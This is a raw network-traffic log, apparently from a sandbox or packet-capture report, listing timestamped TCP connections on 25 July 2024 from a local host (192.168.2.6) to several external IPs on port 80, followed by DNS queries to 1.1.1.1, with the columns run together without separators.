                                                                                                                                                                                                                        Jul 25, 2024 15:14:55.245618105 CEST804975192.246.89.93192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:59.237828016 CEST4975180192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:14:59.237978935 CEST4973380192.168.2.6170.39.226.155
                                                                                                                                                                                                                        Jul 25, 2024 15:14:59.550148010 CEST4973380192.168.2.6170.39.226.155
                                                                                                                                                                                                                        Jul 25, 2024 15:15:00.158144951 CEST4973380192.168.2.6170.39.226.155
                                                                                                                                                                                                                        Jul 25, 2024 15:15:01.361170053 CEST4973380192.168.2.6170.39.226.155
                                                                                                                                                                                                                        Jul 25, 2024 15:15:03.767431974 CEST4973380192.168.2.6170.39.226.155
                                                                                                                                                                                                                        Jul 25, 2024 15:15:08.579945087 CEST4973380192.168.2.6170.39.226.155
                                                                                                                                                                                                                        Jul 25, 2024 15:15:09.406980991 CEST4975380192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:15:09.415255070 CEST804975392.246.89.93192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:09.415361881 CEST4975380192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:15:09.417257071 CEST4975380192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:15:09.423211098 CEST804975392.246.89.93192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:13.424683094 CEST4975380192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:15:18.189291000 CEST4973380192.168.2.6170.39.226.155
                                                                                                                                                                                                                        Jul 25, 2024 15:15:22.129865885 CEST4975480192.168.2.6208.100.26.245
                                                                                                                                                                                                                        Jul 25, 2024 15:15:22.134931087 CEST8049754208.100.26.245192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:22.135050058 CEST4975480192.168.2.6208.100.26.245
                                                                                                                                                                                                                        Jul 25, 2024 15:15:22.135179043 CEST4975480192.168.2.6208.100.26.245
                                                                                                                                                                                                                        Jul 25, 2024 15:15:22.141678095 CEST8049754208.100.26.245192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:22.630103111 CEST8049754208.100.26.245192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:22.630192041 CEST4975480192.168.2.6208.100.26.245
                                                                                                                                                                                                                        Jul 25, 2024 15:15:27.866867065 CEST4975580192.168.2.644.213.104.86
                                                                                                                                                                                                                        Jul 25, 2024 15:15:27.873210907 CEST804975544.213.104.86192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:27.873302937 CEST4975580192.168.2.644.213.104.86
                                                                                                                                                                                                                        Jul 25, 2024 15:15:27.873435020 CEST4975580192.168.2.644.213.104.86
                                                                                                                                                                                                                        Jul 25, 2024 15:15:27.880100012 CEST804975544.213.104.86192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:28.415024996 CEST804975544.213.104.86192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:28.415045023 CEST804975544.213.104.86192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:28.415157080 CEST4975580192.168.2.644.213.104.86
                                                                                                                                                                                                                        Jul 25, 2024 15:15:29.423971891 CEST4975580192.168.2.644.213.104.86
                                                                                                                                                                                                                        Jul 25, 2024 15:15:29.430203915 CEST804975544.213.104.86192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:32.735729933 CEST4975680192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:15:32.736521959 CEST4975480192.168.2.6208.100.26.245
                                                                                                                                                                                                                        Jul 25, 2024 15:15:32.782696962 CEST804975644.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:32.782819986 CEST4975680192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:15:32.783184052 CEST4975680192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:15:32.791361094 CEST8049754208.100.26.245192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:32.791608095 CEST4975480192.168.2.6208.100.26.245
                                                                                                                                                                                                                        Jul 25, 2024 15:15:32.815059900 CEST804975644.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:33.325500965 CEST804975644.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:33.325592995 CEST4975680192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:15:33.325607061 CEST804975644.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:33.325701952 CEST4975680192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:15:34.330142975 CEST4975680192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:15:34.336720943 CEST804975644.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:43.971405983 CEST4975980192.168.2.613.251.16.150
                                                                                                                                                                                                                        Jul 25, 2024 15:15:43.978975058 CEST804975913.251.16.150192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:43.979091883 CEST4975980192.168.2.613.251.16.150
                                                                                                                                                                                                                        Jul 25, 2024 15:15:43.979273081 CEST4975980192.168.2.613.251.16.150
                                                                                                                                                                                                                        Jul 25, 2024 15:15:43.984551907 CEST804975913.251.16.150192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:45.377959013 CEST804975913.251.16.150192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:45.377980947 CEST804975913.251.16.150192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:45.378020048 CEST4975980192.168.2.613.251.16.150
                                                                                                                                                                                                                        Jul 25, 2024 15:15:45.378057003 CEST4975980192.168.2.613.251.16.150
                                                                                                                                                                                                                        Jul 25, 2024 15:15:46.392570972 CEST4975980192.168.2.613.251.16.150
                                                                                                                                                                                                                        Jul 25, 2024 15:15:46.397489071 CEST804975913.251.16.150192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:46.675147057 CEST4976080192.168.2.6185.215.113.66
                                                                                                                                                                                                                        Jul 25, 2024 15:15:46.680124044 CEST8049760185.215.113.66192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:46.680269003 CEST4976080192.168.2.6185.215.113.66
                                                                                                                                                                                                                        Jul 25, 2024 15:15:46.680414915 CEST4976080192.168.2.6185.215.113.66
                                                                                                                                                                                                                        Jul 25, 2024 15:15:46.685251951 CEST8049760185.215.113.66192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:47.481281042 CEST8049760185.215.113.66192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:47.481369019 CEST4976080192.168.2.6185.215.113.66
                                                                                                                                                                                                                        Jul 25, 2024 15:15:58.223592043 CEST4976180192.168.2.618.141.10.107
                                                                                                                                                                                                                        Jul 25, 2024 15:15:58.230635881 CEST804976118.141.10.107192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:58.230904102 CEST4976180192.168.2.618.141.10.107
                                                                                                                                                                                                                        Jul 25, 2024 15:15:58.230988979 CEST4976180192.168.2.618.141.10.107
                                                                                                                                                                                                                        Jul 25, 2024 15:15:58.235878944 CEST804976118.141.10.107192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:59.589257002 CEST804976118.141.10.107192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:59.589299917 CEST804976118.141.10.107192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:59.589423895 CEST4976180192.168.2.618.141.10.107
                                                                                                                                                                                                                        Jul 25, 2024 15:15:59.589462996 CEST4976180192.168.2.618.141.10.107
                                                                                                                                                                                                                        Jul 25, 2024 15:16:00.601222992 CEST4976180192.168.2.618.141.10.107
                                                                                                                                                                                                                        Jul 25, 2024 15:16:00.606807947 CEST804976118.141.10.107192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:02.073951006 CEST4976280192.168.2.644.213.104.86
                                                                                                                                                                                                                        Jul 25, 2024 15:16:02.079067945 CEST804976244.213.104.86192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:02.079140902 CEST4976280192.168.2.644.213.104.86
                                                                                                                                                                                                                        Jul 25, 2024 15:16:02.079317093 CEST4976280192.168.2.644.213.104.86
                                                                                                                                                                                                                        Jul 25, 2024 15:16:02.084923029 CEST804976244.213.104.86192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:02.560853004 CEST804976244.213.104.86192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:02.561155081 CEST804976244.213.104.86192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:02.561285973 CEST4976280192.168.2.644.213.104.86
                                                                                                                                                                                                                        Jul 25, 2024 15:16:03.564405918 CEST4976280192.168.2.644.213.104.86
                                                                                                                                                                                                                        Jul 25, 2024 15:16:03.569322109 CEST804976244.213.104.86192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:03.873586893 CEST4976380192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:03.878396034 CEST804976354.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:03.882230043 CEST4976380192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:03.882386923 CEST4976380192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:03.887497902 CEST804976354.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:04.593945980 CEST804976354.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:04.594111919 CEST4976380192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:04.594152927 CEST804976354.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:04.594238997 CEST4976380192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:05.595659971 CEST4976380192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:05.600620985 CEST804976354.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:09.703855038 CEST4976480192.168.2.634.218.204.173
                                                                                                                                                                                                                        Jul 25, 2024 15:16:09.708695889 CEST804976434.218.204.173192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:09.708782911 CEST4976480192.168.2.634.218.204.173
                                                                                                                                                                                                                        Jul 25, 2024 15:16:09.708934069 CEST4976480192.168.2.634.218.204.173
                                                                                                                                                                                                                        Jul 25, 2024 15:16:09.713700056 CEST804976434.218.204.173192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:10.421859026 CEST804976434.218.204.173192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:10.422225952 CEST804976434.218.204.173192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:10.422240973 CEST4976480192.168.2.634.218.204.173
                                                                                                                                                                                                                        Jul 25, 2024 15:16:10.422391891 CEST4976480192.168.2.634.218.204.173
                                                                                                                                                                                                                        Jul 25, 2024 15:16:11.423844099 CEST4976480192.168.2.634.218.204.173
                                                                                                                                                                                                                        Jul 25, 2024 15:16:11.428877115 CEST804976434.218.204.173192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:12.851516008 CEST4976680192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:12.861829042 CEST804976654.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:12.861943007 CEST4976680192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:12.862078905 CEST4976680192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:12.869107008 CEST804976654.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:13.643528938 CEST804976654.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:13.643692017 CEST804976654.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:13.644027948 CEST4976680192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:14.658166885 CEST4976680192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:14.663346052 CEST804976654.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:17.472385883 CEST8049760185.215.113.66192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:17.475244999 CEST4976080192.168.2.6185.215.113.66
                                                                                                                                                                                                                        Jul 25, 2024 15:16:20.974704981 CEST4976780192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:20.979602098 CEST804976754.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:20.979798079 CEST4976780192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:20.979919910 CEST4976780192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:20.984827042 CEST804976754.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:22.126832962 CEST804976754.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:22.126954079 CEST4976780192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:22.127032995 CEST804976754.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:22.127075911 CEST4976780192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:22.128233910 CEST804976754.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:22.128268957 CEST4976780192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:22.129607916 CEST804976754.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:22.129666090 CEST4976780192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:23.142750978 CEST4976780192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:23.147826910 CEST804976754.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:29.668469906 CEST4976980192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:29.673903942 CEST804976954.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:29.674693108 CEST4976980192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:29.674860954 CEST4976980192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:29.680543900 CEST804976954.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:30.553319931 CEST804976954.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:30.553397894 CEST4976980192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:30.553441048 CEST804976954.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:30.553517103 CEST4976980192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:31.565337896 CEST4976980192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:16:31.575417995 CEST804976954.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:36.357040882 CEST4977080192.168.2.674.119.239.234
                                                                                                                                                                                                                        Jul 25, 2024 15:16:36.375930071 CEST804977074.119.239.234192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:36.376116991 CEST4977080192.168.2.674.119.239.234
                                                                                                                                                                                                                        Jul 25, 2024 15:16:36.376218081 CEST4977080192.168.2.674.119.239.234
                                                                                                                                                                                                                        Jul 25, 2024 15:16:36.391432047 CEST804977074.119.239.234192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:57.852740049 CEST804977074.119.239.234192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:16:57.852843046 CEST4977080192.168.2.674.119.239.234
                                                                                                                                                                                                                        Jul 25, 2024 15:16:57.852893114 CEST4977080192.168.2.674.119.239.234
                                                                                                                                                                                                                        Jul 25, 2024 15:16:57.860502958 CEST804977074.119.239.234192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:04.485295057 CEST4977180192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:04.490923882 CEST804977154.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:04.491015911 CEST4977180192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:04.491183043 CEST4977180192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:04.496149063 CEST804977154.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:05.252253056 CEST804977154.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:05.252309084 CEST4977180192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:05.255053043 CEST804977154.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:05.255150080 CEST4977180192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:06.267601013 CEST4977180192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:06.367876053 CEST804977154.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:09.052252054 CEST4977280192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:09.057208061 CEST804977254.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:09.057277918 CEST4977280192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:09.057415962 CEST4977280192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:09.064940929 CEST804977254.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:09.953108072 CEST804977254.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:09.954080105 CEST804977254.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:09.954226017 CEST4977280192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:10.970735073 CEST4977280192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:10.980952978 CEST804977254.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:14.848233938 CEST4977380192.168.2.634.218.204.173
                                                                                                                                                                                                                        Jul 25, 2024 15:17:15.055406094 CEST804977334.218.204.173192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:15.055591106 CEST4977380192.168.2.634.218.204.173
                                                                                                                                                                                                                        Jul 25, 2024 15:17:15.055804968 CEST4977380192.168.2.634.218.204.173
                                                                                                                                                                                                                        Jul 25, 2024 15:17:15.062446117 CEST804977334.218.204.173192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:15.810820103 CEST804977334.218.204.173192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:15.810859919 CEST804977334.218.204.173192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:15.810889959 CEST4977380192.168.2.634.218.204.173
                                                                                                                                                                                                                        Jul 25, 2024 15:17:15.810925007 CEST4977380192.168.2.634.218.204.173
                                                                                                                                                                                                                        Jul 25, 2024 15:17:16.815237999 CEST4977380192.168.2.634.218.204.173
                                                                                                                                                                                                                        Jul 25, 2024 15:17:16.820272923 CEST804977334.218.204.173192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:18.067245960 CEST4977480192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:18.072341919 CEST804977454.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:18.072509050 CEST4977480192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:18.072652102 CEST4977480192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:18.077513933 CEST804977454.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:18.813992977 CEST804977454.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:18.814126968 CEST804977454.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:18.814182043 CEST4977480192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:18.815063000 CEST4977480192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:19.830090046 CEST4977480192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:19.834983110 CEST804977454.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:25.693257093 CEST4977580192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:25.699414015 CEST804977554.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:25.699481010 CEST4977580192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:25.699661016 CEST4977580192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:25.705101013 CEST804977554.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:26.514657974 CEST804977554.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:26.514722109 CEST4977580192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:26.523116112 CEST804977554.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:26.523196936 CEST4977580192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:26.529818058 CEST804977554.244.188.177192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:17:26.529865980 CEST4977580192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:28.423892021 CEST4977580192.168.2.654.244.188.177
                                                                                                                                                                                                                        Jul 25, 2024 15:17:28.696512938 CEST804977554.244.188.177192.168.2.6
                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.352777958 CEST6196453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.451169968 CEST53619641.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:40.199372053 CEST6503153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.218578100 CEST6503153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.555955887 CEST53650311.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.556565046 CEST53650311.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:42.547554970 CEST5012053192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:13:42.754754066 CEST53501201.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:06.944644928 CEST5704253192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:07.002186060 CEST53570421.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:29.647766113 CEST5070853192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:30.005697012 CEST53507081.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:39.145549059 CEST5770253192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:39.196909904 CEST53577021.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:40.316734076 CEST6195453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:40.575145960 CEST53619541.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:41.801616907 CEST6024653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:41.853352070 CEST53602461.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:42.973072052 CEST5657353192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:43.075299025 CEST53565731.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:44.191970110 CEST5535353192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:44.449604034 CEST53553531.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:45.584778070 CEST6544653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:45.855427027 CEST53654461.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:46.973747969 CEST5930453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:47.028892040 CEST53593041.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:48.161391020 CEST5131153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:48.610685110 CEST53513111.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:50.240822077 CEST6548853192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:50.328067064 CEST53654881.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:51.443193913 CEST5465853192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:51.529253960 CEST53546581.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:52.646769047 CEST5324753192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:52.697886944 CEST53532471.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:53.818129063 CEST5415153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:53.908288956 CEST53541511.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:55.036415100 CEST5924653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:14:55.234798908 CEST53592461.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:00.365200996 CEST4939953192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:00.414899111 CEST53493991.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:01.536808968 CEST5907353192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:01.625380993 CEST53590731.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:02.739101887 CEST5880253192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:02.889776945 CEST53588021.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:04.004798889 CEST6059653192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:04.096728086 CEST53605961.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:05.223871946 CEST5349153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:05.274229050 CEST53534911.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:06.395818949 CEST5716853192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:06.450229883 CEST53571681.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:07.569322109 CEST5091153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:07.652426004 CEST53509111.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:08.770872116 CEST5697453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:09.405515909 CEST53569741.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:14.560338974 CEST6293753192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:14.613394022 CEST53629371.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:15.741241932 CEST5042453192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:15.823622942 CEST53504241.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:16.946208954 CEST6534853192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:17.031714916 CEST53653481.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:18.145437956 CEST5691853192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:18.194735050 CEST53569181.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:19.317435980 CEST5756153192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:19.404558897 CEST53575611.1.1.1192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:15:20.541022062 CEST5091253192.168.2.61.1.1.1
                                                                                                                                                                                                                        Jul 25, 2024 15:15:20.624769926 CEST53509121.1.1.1192.168.2.6
